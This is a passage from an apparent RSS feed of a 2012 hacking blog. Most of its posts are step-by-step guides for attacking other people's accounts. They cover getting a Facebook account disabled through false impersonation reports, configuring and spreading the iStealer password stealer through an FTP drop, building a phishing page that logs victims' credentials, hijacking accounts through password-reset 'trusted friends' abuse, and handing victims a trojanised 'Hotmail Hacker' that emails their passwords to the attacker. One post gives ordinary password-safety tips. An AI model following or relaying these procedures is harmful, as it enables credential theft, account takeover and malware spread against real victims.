&lt;h4 style=&quot;text-align: left;&quot;&gt;
HOW TO DO IT?&lt;/h4&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
1. Go this page:&lt;br /&gt;&lt;br /&gt;&lt;a href=&quot;http://www.facebook.com/help/contact.php?show_form=hack_nologin_access&quot;&gt;http://www.facebook.com/help/contact.php?show_form=hack_nologin_access&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;2. Enter details. In the place of&amp;nbsp; email address&amp;nbsp; enter the fake email u created.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;3. you will get a mail on that ID in which facebook people will ask your problem. Reply to them that you are victim&#39;s name and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write &#39; I am a girl and it poses threat to my social life &#39; and write anything you want that could make them take action. ( no need though in 100 % cases they delete the account )&lt;br /&gt;&lt;br /&gt;&amp;nbsp;4. After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don&#39;t have access to it. And repeat what all you wrote in first mail.&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;5. Next Day or Same Day you will get an Email that your account is disabled.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Enjoy! &lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/delete-any-facebook-account-facebook.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s72-c/facebook.png" height="72" width="72"/><thr:total>14</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-2783519323629165146</guid><pubDate>Fri, 19 Oct 2012 15:52:00 +0000</pubDate><atom:updated>2012-10-19T08:52:28.503-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><title>Protect Your Email Id and Facebook from Hackers : Facebook Hacking</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzySYVOWb-4ObmmH1s1jjqCg55odSkNXPcMSK5pZzvu8ImIyblE1H5EWjYC8Ob9FeWIchczVHIUAiVsHydEB67K7DLWTgdVSxQrfOPOuKAuH5bcWojK_jjNFD5FKq8fhuLajojQQaMY_8/s1600/facebook1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzySYVOWb-4ObmmH1s1jjqCg55odSkNXPcMSK5pZzvu8ImIyblE1H5EWjYC8Ob9FeWIchczVHIUAiVsHydEB67K7DLWTgdVSxQrfOPOuKAuH5bcWojK_jjNFD5FKq8fhuLajojQQaMY_8/s1600/facebook1.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;Protect Your Email Id and Facebook from Hackers&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
How to Protect Your Email Id n Facebook By Hackers &lt;br /&gt;&lt;br /&gt;&amp;nbsp;Everybody use email accounts and social networking websites such as orkut, twitter and facebook. There are important information of a person in these email accounts and social networking website. It is important to protect these account from hackers. Because hackers always try to get others account to get those secret and personal data for bad purpose. If use your email id for business and other services then it&#39;s a great loss and trouble for you. So always try to be safe from hackers&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Follow these simple steps i am writing below to protect yourself from being hacked.&lt;br /&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;&amp;nbsp;Never share your password to anyone.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Don&#39;t use password as your nick name, phone no. or pet names..&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Use the combination of lower case, upper case, numbers and special characters for passwords.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Never click on any suspected link comes in a mail from unknown sender.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Never give your passwords to any 3rd party websites for any service.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Use different passwords for different accounts.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Check the website url every time before login. EX: check url to be http://www.facebook.com before login to face account. Never login to website such as http://www.facebook.otherwebsit.com (MOST IMPORTANT)&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Use secondary email address and mobile phone numbers with secret questions for account recovery.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Never use any javascript code in url while login to any of your email or any other website account. It may be a cookie stealer script.&lt;/li&gt;
&lt;li&gt;&amp;nbsp;Use latest antivirus and antimalware softwares with firewall on.&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&amp;nbsp;These are some steps which you can follow for safe surfing over the internet.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;Don&#39;t give any chance to hackers.....&lt;/div&gt;
&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/protect-facebook-id-from-hackers-facebook-hacking.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzySYVOWb-4ObmmH1s1jjqCg55odSkNXPcMSK5pZzvu8ImIyblE1H5EWjYC8Ob9FeWIchczVHIUAiVsHydEB67K7DLWTgdVSxQrfOPOuKAuH5bcWojK_jjNFD5FKq8fhuLajojQQaMY_8/s72-c/facebook1.jpg" height="72" width="72"/><thr:total>16</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-2426419083246987736</guid><pubDate>Fri, 19 Oct 2012 15:16:00 +0000</pubDate><atom:updated>2012-10-19T08:16:59.206-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">stealers</category><title>istealer : Stealers</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4EVTbIvr4ib6xtG9JcvyHCfyEOQcCUEu8V7ilXsxO7CQIrtDV-jmtjkVDEe_IksGUrET6Hg-N3g4GUSDptFfhtBaaWFubkU5U99Od7QF5NTX6AC3-ai8MF2cuPsU07RGDjVIhA3w5pUk/s1600/istealer.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;311&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4EVTbIvr4ib6xtG9JcvyHCfyEOQcCUEu8V7ilXsxO7CQIrtDV-jmtjkVDEe_IksGUrET6Hg-N3g4GUSDptFfhtBaaWFubkU5U99Od7QF5NTX6AC3-ai8MF2cuPsU07RGDjVIhA3w5pUk/s320/istealer.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;istealer&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
This is tutorial specially for that people who are know lil bit about configure a stealers server.&lt;br /&gt;
&lt;br /&gt;
before start we need to sign up a ftp service i recomended this site&lt;br /&gt;
&lt;a href=&quot;http://www.drivehq.com/&quot;&gt;http://www.drivehq.com&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
STEP 1&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;Get the staeler from following link&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;a href=&quot;http://adf.ly/2542194/http://www.mediafire.com/?a1m6izfyrocatas&quot; target=&quot;_blank&quot;&gt;Download here&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
STEP 2&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Run application and extract it&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Click on &quot;iStealer&quot;.&lt;br /&gt;IF YOU GET ERROR MISSING COMDLG32.OCX&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Download the missing OCX here:&lt;br /&gt;&lt;a href=&quot;http://www.ocxdump.com/download-ocx-file...nload.html&quot;&gt;http://www.ocxdump.com/download-ocx-file...nload.html&lt;/a&gt;&amp;nbsp;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
Downloaded the missing OCX extract it into WINDOWS&amp;gt;SYSTEM32&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
STEP 3 ( Create server for steal passwords )&lt;/h3&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&amp;nbsp;Host copy and paste this &quot;ftp.drivehq.com&quot; &lt;br /&gt;Username enter your drivehq.com username.&lt;br /&gt;Password enter your drivehq.com password.&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
After this if you want to bind your server(password stealer)&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
with another application, song, document, picture etc. Click &quot;bind with another file&quot; and chose what file U want 2 bind your server with ... Also you can cahnge icon and thn build &lt;b&gt;server&lt;/b&gt;. After make compress it and upload and spread where u want &lt;/div&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/istealer-stealers.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4EVTbIvr4ib6xtG9JcvyHCfyEOQcCUEu8V7ilXsxO7CQIrtDV-jmtjkVDEe_IksGUrET6Hg-N3g4GUSDptFfhtBaaWFubkU5U99Od7QF5NTX6AC3-ai8MF2cuPsU07RGDjVIhA3w5pUk/s72-c/istealer.jpg" height="72" width="72"/><thr:total>8</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-4618729358026515143</guid><pubDate>Wed, 17 Oct 2012 21:28:00 +0000</pubDate><atom:updated>2012-10-17T14:28:35.779-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><title>Hack Facebook Accounts BY  Fake login Page: facebook hacking</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg10bBiV-4GBQ7ZUd8JlcQ32Nw4xNVQD6-r1eniKv3AL8AvrfIQxcDa_5GphNa-DQPprub8UVy8_eYBO6oLP-8dZTdXaYDksGfsDYNLfnKQ9sQ25W5Xfpr9e56fA6LCJ7OdfmiMAoaIaNo/s1600/hack-facebook.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg10bBiV-4GBQ7ZUd8JlcQ32Nw4xNVQD6-r1eniKv3AL8AvrfIQxcDa_5GphNa-DQPprub8UVy8_eYBO6oLP-8dZTdXaYDksGfsDYNLfnKQ9sQ25W5Xfpr9e56fA6LCJ7OdfmiMAoaIaNo/s1600/hack-facebook.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;Hack Facebook Account By Fake login Page &lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;
&amp;nbsp;Today i will teach you how to make a Fake login page (phisher) to Hack Facebook account Follow the steps given below to Hack a facebook account. &lt;br /&gt;&lt;br /&gt;&amp;nbsp;Hack a Facebook Account By Fake login Page :&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;First of all we need a fake login page (fake.html), login.php You can download both the files from &lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;&lt;a href=&quot;http://adf.ly/2542194/http://www.multiupload.com/RBCYHJBP8F&quot; target=&quot;_blank&quot;&gt;Click Here&lt;/a&gt; &lt;br /&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Now open login.php which we downloaded earlier with a note pad and press (ctrl+ f )&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;and search for the term http://enteryoursite.com and replace with the site address&lt;br /&gt;&amp;nbsp;where you want victim to be redirected and save it&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Now create a account in Free web hosting site like 110mb.com , T35.com or ripway.com&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Now upload both the files (fake.html , login.php ) to your directory .Now send the &lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;fake.html link to your victim&lt;br /&gt;
&lt;br /&gt;
Example :-&amp;nbsp; www.yoursite.110 mb.com/fake.html&lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Now when the victim clicks the link and enters all the information in our fake login&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;page and click login He will be redirected to site which we did in step 3 &lt;br /&gt;&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Now to see the victims id ,password login to your account &quot;110mb.com &quot; where&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;you can see a newfile &quot;password.txt&quot; open it .Now you can see the userid &lt;br /&gt;&amp;nbsp;and the password of the victim&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;This a simple but a very effective method of Hacking a facebook account Enjoy!&lt;/div&gt;
&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/hack-facebook-by-fake-login-page.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg10bBiV-4GBQ7ZUd8JlcQ32Nw4xNVQD6-r1eniKv3AL8AvrfIQxcDa_5GphNa-DQPprub8UVy8_eYBO6oLP-8dZTdXaYDksGfsDYNLfnKQ9sQ25W5Xfpr9e56fA6LCJ7OdfmiMAoaIaNo/s72-c/hack-facebook.png" height="72" width="72"/><thr:total>36</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-6803675548553021090</guid><pubDate>Wed, 17 Oct 2012 21:09:00 +0000</pubDate><atom:updated>2012-10-17T14:30:15.177-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">facebook</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">tricksntips</category><title>Hack Facebook Accounts : Facebook Hacking</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s1600/facebook.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s320/facebook.png&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;u&gt;&lt;i&gt;&lt;b&gt;Hack Facebook Accounts&lt;/b&gt;&lt;/i&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;There are many ways to hack facebook accounts &lt;br /&gt;
&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Phishing&lt;/li&gt;
&lt;li&gt;Keylogging&lt;/li&gt;
&lt;li&gt;Reverting&lt;/li&gt;
&lt;li&gt;Cookie stealing&lt;/li&gt;
&lt;li&gt;etc&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&amp;nbsp;This method we will be using is Reverting&lt;br /&gt;
&amp;nbsp;which is simply using the information we gathered about the slave in facebook password reset function&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;To gather the information you first need to find out their email which will be on their facebook information page&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;once you have the email use sites like&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;http://www.pipl.com/email/&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&amp;nbsp;which search the whole internet for every social networking account linked with that email&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;if they have a site you can use&lt;/div&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;http://whois.domaintools.com/&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&amp;nbsp;to get infomation about them&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;if using these methods you can find out the answer to their security question then very well but if not don&#39;t worry we have other methods &lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;So lets start&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;- First make three facebook accounts and add your slave ( he must accept )&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;- then go here&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/2542194/http://www.facebook.com/recover.php&quot; target=&quot;_blank&quot;&gt;Click here &lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&amp;nbsp;there put the slave&#39;s email and fill the captcha then it will ask you to enter a new email where you put your email ( not the one used on an existing account but a new one )&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;- it will then ask you the security question ( if you know it very well then just put it and the account is hacked )&lt;br /&gt;
&amp;nbsp;but if you do not know the answer just keep entering random words until the limit is exceeded&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;- Once the limit is exceeded it will ask you to choose three trusted friends&lt;br /&gt;
&amp;nbsp;there you put the three accounts you made and added your slave&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;- It will then send all three accounts the security code&lt;br /&gt;
&amp;nbsp;and you go login all three and get the security code and just put it&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;- Hacked ,&amp;nbsp;change the security question and he can&#39;t recover the account unless he uses the same thing we did.. Enjoy!&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/hack-facebook-accounts-facebook-hacking.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjt6PmQD7X1RxasEEM2s47T7Se-gBbBhrAKQr00M1mS16yHt5aMjqDFDpmgHp36wAXgZfovGDGEoUqDFLp8lRC2tbGZ4FjLOdefGwhiLKOwXg4CDBe7kd7bmaUXukppC5-HKC5RCTD1Ocg/s72-c/facebook.png" height="72" width="72"/><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-6328151455977751758</guid><pubDate>Sun, 14 Oct 2012 09:46:00 +0000</pubDate><atom:updated>2012-10-14T02:46:44.956-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Softwares</category><category domain="http://www.blogger.com/atom/ns#">Yahoo Hacking</category><title>Yahoo Multi Id Maker : Yahoo</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk4YfAfEqk8V4AoUAdIiCtUpqG_dk3NE27HdubPbaPijt38jMceYMjLNpsRSFX3MG-eMKE7tZwqeChG9r_ge8ZTmGglnaPoPLgKEm4_ew3y91YFv6m4iBAjxiicb7iYVpsPQr9n68xB3w/s1600/Yahoo-multi-ID-maker.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;304&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk4YfAfEqk8V4AoUAdIiCtUpqG_dk3NE27HdubPbaPijt38jMceYMjLNpsRSFX3MG-eMKE7tZwqeChG9r_ge8ZTmGglnaPoPLgKEm4_ew3y91YFv6m4iBAjxiicb7iYVpsPQr9n68xB3w/s320/Yahoo-multi-ID-maker.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;---------------------------&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;color: #e06666;&quot;&gt;Yahoo multi id maker&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: blue;&quot;&gt;---------------------------&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
By this tools you will be able to make&amp;nbsp; multi unlimited ids. Now you can get rid of making ids manually from yahoo web. And this tools has many function you can make ids of different yahoo domains as mentioned in picture&amp;nbsp;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/2542194/http://www.ziddu.com/download/20603059/Yahoo-multi-ID-maker.zip.html&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Or&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/2542194/http://www.mediafire.com/?ukxkw1upi6x2yyk&quot; target=&quot;_blank&quot;&gt;Here&lt;/a&gt;&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/yahoo-multi-id-maker-yahoo.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk4YfAfEqk8V4AoUAdIiCtUpqG_dk3NE27HdubPbaPijt38jMceYMjLNpsRSFX3MG-eMKE7tZwqeChG9r_ge8ZTmGglnaPoPLgKEm4_ew3y91YFv6m4iBAjxiicb7iYVpsPQr9n68xB3w/s72-c/Yahoo-multi-ID-maker.jpg" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-7819068526794316376</guid><pubDate>Tue, 09 Oct 2012 16:35:00 +0000</pubDate><atom:updated>2012-10-11T13:34:39.697-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Msn Hacaking</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>HACK HOTMAIL ACCOUNTS: Msn Hacker</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7ZUgFr_tGxLxt-VLB3CWvlMZ7G3f4w8BgTphmPYum50-RuN7Y6FQ-SDBMIgJHRm2NSnje9EYn30JlW3h5UyagLs542BVmKGRIZ-PgnAXU2T5lMBcndw3wqwhyphenhyphen1JtuG5uwgSsKogeHirQ_/s1600/Hack+Hotmail+Accounts.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7ZUgFr_tGxLxt-VLB3CWvlMZ7G3f4w8BgTphmPYum50-RuN7Y6FQ-SDBMIgJHRm2NSnje9EYn30JlW3h5UyagLs542BVmKGRIZ-PgnAXU2T5lMBcndw3wqwhyphenhyphen1JtuG5uwgSsKogeHirQ_/s1600/Hack+Hotmail+Accounts.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
I had posted already &lt;a href=&quot;http://adf.ly/2542194/www.the-hacking-arena.blogspot.com/search/label/Gmail%20Hacking&quot; target=&quot;_blank&quot;&gt;Gmail Hacker&lt;/a&gt; to hack Gmail accounts.With this software we can hack hotmail accounts.&lt;br /&gt;
&lt;ul style=&quot;text-align: left;&quot;&gt;
&lt;li&gt;Run Hotmail Hacker Builder.exe file on ur pc.&lt;/li&gt;
&lt;li&gt;Enter your email address&amp;nbsp; password and subject of email you want to receive&lt;/li&gt;
&lt;li&gt;Click on &quot;Build&quot;. This will create your own Hotmail hacker in Hotmail hacker folder.&lt;/li&gt;
&lt;li&gt;Now, send this Hotmail Hacker.exe file to victim of which you want to hack Hotmail password and convince him that this program can hack anyone&#39;s Hotmail passwords. &lt;/li&gt;
&lt;li&gt;Say him to run Hotmail Hacker.exe and enter all information including his Hotmail ID and password and Hotmail ID of victim he want to hack. As he enters this information and hits Login and Start he will receive a error message.&lt;/li&gt;
&lt;li&gt;You will receive an email in your account containing his password. Hurrah! you will now be able to hack hotmail password.&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;a href=&quot;http://adf.ly/2542194/www.ziddu.com/download/20560695/HotmailHacker.zip.html&quot; target=&quot;_blank&quot;&gt;Download&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Or&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://adf.ly/2542194/www.mediafire.com/?sgpgg7pz9afj7fz&quot; target=&quot;_blank&quot;&gt;Herer&lt;/a&gt;&lt;br /&gt;
&lt;div&gt;
&lt;div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description><link>http://hackingcrackingsoftwares.blogspot.com/2012/10/hack-hotmail-accounts-msn-hacker.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7ZUgFr_tGxLxt-VLB3CWvlMZ7G3f4w8BgTphmPYum50-RuN7Y6FQ-SDBMIgJHRm2NSnje9EYn30JlW3h5UyagLs542BVmKGRIZ-PgnAXU2T5lMBcndw3wqwhyphenhyphen1JtuG5uwgSsKogeHirQ_/s72-c/Hack+Hotmail+Accounts.jpg" height="72" width="72"/><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-615852925198318135.post-7219676379075756281</guid><pubDate>Fri, 05 Oct 2012 22:13:00 +0000</pubDate><atom:updated>2012-10-11T13:34:44.936-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Others</category><category 